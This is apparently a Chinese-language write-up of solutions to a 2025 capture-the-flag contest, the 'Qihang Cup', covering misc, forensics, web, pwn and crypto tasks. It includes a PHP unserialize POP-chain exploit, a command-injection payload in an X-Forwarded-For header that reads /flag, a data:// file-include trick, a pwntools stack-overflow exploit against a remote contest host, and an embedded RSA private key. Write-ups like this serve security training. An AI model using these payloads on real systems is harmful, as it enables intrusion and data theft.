第一届“启航杯”网络安全挑战赛WP

misc

PvzHE

去这个文件夹

有一张图片

QHCTF{300cef31-68d9-4b72-b49d-a7802da481a5}

QHCTF For Year 2025

攻防世界有一样的

080714212829302316092230

对应Q

以此类推

QHCTF{FUN}

请找出拍摄地所在位置

柳城

顺丰

forensics

win01

这个软件

云沙盒分析一下

md5

ad4fdee2eada36ec3c20e9d6311cf258

Win_02

HackY$

32ED87BDB5FDC5E9CBA88547376818D4

123456

HackY$_123456

fb484ad326c0f3a4970d1352bfbafef8

Win_07

找到密码

Th3_1s_F1ag.Z1p_P@ssW0rd_Y0u_Now

解压

QHCTF{6143b46a-8e98-4356-a9b2-251a7ec19e51}

web

Web_pop

 <?php
error_reporting(0);
highlight_file(__FILE__);
class Start{
    public $name;
    protected $func;
 
    public function __destruct()
    {
        echo "Welcome to QHCTF 2025, ".$this->name;
    }
 
    public function __isset($var)
    {
        ($this->func)();
    }
}
 
class Sec{
    private $obj;
    private $var;
 
    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }
 
    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}
 
class Easy{
    public $cla;
 
    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}
 
class eeee{
    public $obj;
 
    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}
 
if(isset($_POST['pop'])){
    unserialize($_POST['pop']);
} 

后门在这里file_get_contents('/flag');

然后逆着看

__invoke

($this->func)();->__invoke

if(isset($this->obj->cmd))->($this->func)();->__invoke

$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke

$this->obj->check($this->var);->$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke

echo "Welcome to QHCTF 2025, ".$this->name;-> $this->obj->check($this->var);->$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke

这样来触发。

也就是

$a=new Start();

$a->name=new Sec();

$a->name->obj=new Easy();

$a->name->obj->cla=new eeee();

$a->name->obj->cla->obj=new Start();

$a->name->obj->cla->obj->func=new Sec();

exp：

<?php
error_reporting(0);
highlight_file(__FILE__);
class Start
{
    public $name;
    public $func;
​
}
​
class Sec
{
    public $obj;
    public $var;
​
}
​
class Easy
{
    public $cla;
​
}
​
class eeee
{
    public $obj;
​
​
}
​
$a = new Start;
$b = new Sec;
$c = new Easy;
$d = new eeee;
$e = new Sec;
$f = new Start;
$a->name = $b;
$b->obj = $c;
$b->var = $d;
$d->obj = $f;
$f->func = $e;
echo serialize($a);

Easy_include

?file=data://text/plain,

即可命令执行

Web_IP

IP的地方可以执行命令

X-Forwarded-For： {system('cat /flag')}

PCREMagic

可以上传文件，对文件名没有限制，最后都会重命名1-9.php

关键是文件内容检测<?php

pwn

Easy_Pwn

vulnerable

栈溢出

exp

from pwn import*
from struct import pack
from ctypes import *
#from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
p=remote('154.64.245.108',33135)
#p=process('./pwn')
libc=ELF("/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6")
elf=ELF('./pwn')
def bug():
    gdb.attach(p)
    pause()
def s(a):
    p.send(a)
def sa(a,b):
    p.sendafter(a,b)
def sl(a):
    p.sendline(a)
def sla(a,b):
    p.sendlineafter(a,b)
def r(a):
    p.recv(a)
def pr(a):
    print(p.recv(a))
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def get_addr64():
    return u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
def get_addr32():
    return u32(p.recvuntil("\xf7")[-4:])
def get_sb():
    return libc_base+libc.sym['system'],libc_base+libc.search(b"/bin/sh\x00").__next__()
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
​
​
pay=b'a'*0x58+p64(0x4011ca)
#bug()
s(pay)
inter()

cr

Easy_RSA

from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import base64
​
# 生成RSA密钥对
private_key = b'-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQCYQjRaBQcBJmdxdCo4YaK/8TIdlj9Cjt6ewjF8NzV7BAj5ZEXy\nsuXdYbXVOAmVKDYKglo9TKUbRVKbPk7f3rIfnIrMqm8TpJTPAnyssiXs3Zy9yz+p\nqWbRTvd0xWJoWxy9TTzdczkS8yVkRBIdNJ3ghJV8B5YVkgFtMoyPX8TQhQIDAQAB\nAoGARibOvyEs2oNKyvO2VjbqCRzEtewZZn20JZqcuTooum6gAeQI9GsnzKnt4PkK\nNT6LM6lekXrEYb29c0iwh6YwE/mOIu5G3Yz2qQJDyZEqvM4N4KnITJM4v1WPv7tC\nurpZj906Odbx6oFXNc5XJMGp6GgjOqqLomBCcRvKlKdX36sCQQDA3GGS4Hy5htlQ\nydkiQujUAAlcoTlx/kPZSrCOehBsOWytwRjiGm1xTu6s8mBY2O+kIDZx1DGbDQ54\nKi9jJqWfAkEAyhr1iR9mofi+WqSfcG41jjmLFUgKFcO/ImcE3kcs2eGLodoyOJF1\nCBPw8ANME36OJiwXNSFOyQJWuzNoJchvWwJAG36Pjn/gaBaYXpMYGHFPfgGvU/xM\nEzs7cvvZ5cXzF2qsWqz/niREW/XzwsYfBCuRJmXNPTcSB1e6K1lgPhNhYwJBALZg\nxZnL4E3hrcUWMVq/2UxS2ROHQrKJRf3BgT8kc3Dae6q+v/sUJ8v2UsID967P0W7Y\n8shbGkGB/spHhYAy82kCQE7UVrGsArk46F1snawUIPUPMye3yBwvCeyCSX+WyQ7h\nS1IaHaAy3kJ9J/0faMDayG724TpMcsBii1pU2Hhh8p0=\n-----END RSA PRIVATE KEY-----'
public_key = b'-----BEGIN PUBLIC KEY-----\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCYQjRaBQcBJmdxdCo4YaK/8TId\nlj9Cjt6ewjF8NzV7BAj5ZEXysuXdYbXVOAmVKDYKglo9TKUbRVKbPk7f3rIfnIrM\nqm8TpJTPAnyssiXs3Zy9yz+pqWbRTvd0xWJoWxy9TTzdczkS8yVkRBIdNJ3ghJV8\nB5YVkgFtMoyPX8TQhQIDAQAB\n-----END PUBLIC KEY-----'
enmessage="PSvEAGef52/sz8q2f3jjC2OJP9pYEa04kSTeTIX3swnAMrJw9ZagvLRplqk+NjdCmvRAbnbYrBXi9aP8sz604rqn+7S58WTyPgnqIkFwynHBY7NTmvVAKKDc7GJWltQql4iVAxFbrwIBREcSZJwhloWGmCa5dBjlMEzWtv6Jx0o="
​
def encrypt_message(message, public_key):
    key = RSA.import_key(public_key)
    cipher = PKCS1_OAEP.new(key)
    encrypted_message = cipher.encrypt(message.encode())
    return base64.b64encode(encrypted_message).decode()
​
def decrypt_message(encrypted_message, private_key):
    key = RSA.import_key(private_key)
    cipher = PKCS1_OAEP.new(key)
    decrypted_message = cipher.decrypt(base64.b64decode(encrypted_message))
    return decrypted_message.decode()
​
#message = "Hello, this is a secret message!"
# encrypted = encrypt_message(message, public_key)
# print("加密后的消息:")
# print(encrypted)
​
decrypted = decrypt_message(enmessage, private_key)
print("解密后的消息:")
print(decrypted)

传入题目给的公钥，私钥，以及密文（访问靶机/encode）即可

QHCTF{ec9ee719-8336-4a7c-8c7f-745c89d220ce}